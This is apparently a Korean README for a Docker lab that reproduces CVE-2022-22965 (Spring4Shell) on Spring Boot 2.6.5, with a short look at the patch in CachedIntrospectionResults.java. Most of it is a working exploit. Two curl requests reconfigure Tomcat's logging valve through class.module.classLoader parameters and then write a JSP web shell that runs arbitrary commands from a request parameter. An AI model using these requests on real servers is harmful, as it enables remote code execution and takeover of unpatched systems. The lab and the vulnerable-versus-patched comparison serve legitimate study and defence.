
CVE-2022-22965 대상 Docker PoC (Spring Boot 버전 2.6.5)
Spring Boot 버전 2.6.5에서 CVE-2022-22965에 대한 Docker PoC

docker compose up --build를 실행하여 취약한 애플리케이션을 빌드하고 시작합니다.curl -H "Accept: text/html;" "http://localhost:8080/demo/itsecurityco?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7b%63%6f%64%65%7d%69&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="를 실행하여 Tomcat 구성 밸브를 변경합니다.curl -H "Accept: text/html;" -H "code: <% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(String.valueOf(1337))).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1) { out.println(new String(b)); } %>" "http://localhost:8080/demo/x"를 실행하여 웹 셸을 생성합니다.Spring Framework 5.3.17(취약) 및 Spring Framework 5.3.18(패치됨)의 소스 코드는 각각 다음에서 다운로드할 수 있습니다:
$ wget https://github.com/spring-projects/spring-framework/archive/refs/tags/v5.3.17.zip
$ wget https://github.com/spring-projects/spring-framework/archive/refs/tags/v5.3.18.zip
취약점은 /spring-beans/src/main/java/org/springframework/beans/CachedIntrospectionResults.java 파일의 290번째 줄에서 발견되었습니다. 여기서 Class.getClassLoader() 및 getProtectionDomain() 메서드에는 유효성 검사가 적용되지만 ClassLoader, ProtectionDomain 유형 및 PropertyDescriptors 이름에는 적용되지 않습니다.
취약한 코드와 패치된 코드의 차이는 diff 명령으로 확인할 수 있습니다.
$ diff spring-framework-5.3.17/spring-beans/src/main/java/org/springframework/beans/CachedIntrospectionResults.java spring-framework-5.3.18/spring-beans/src/main/java/org/springframework/beans/CachedIntrospectionResults.java
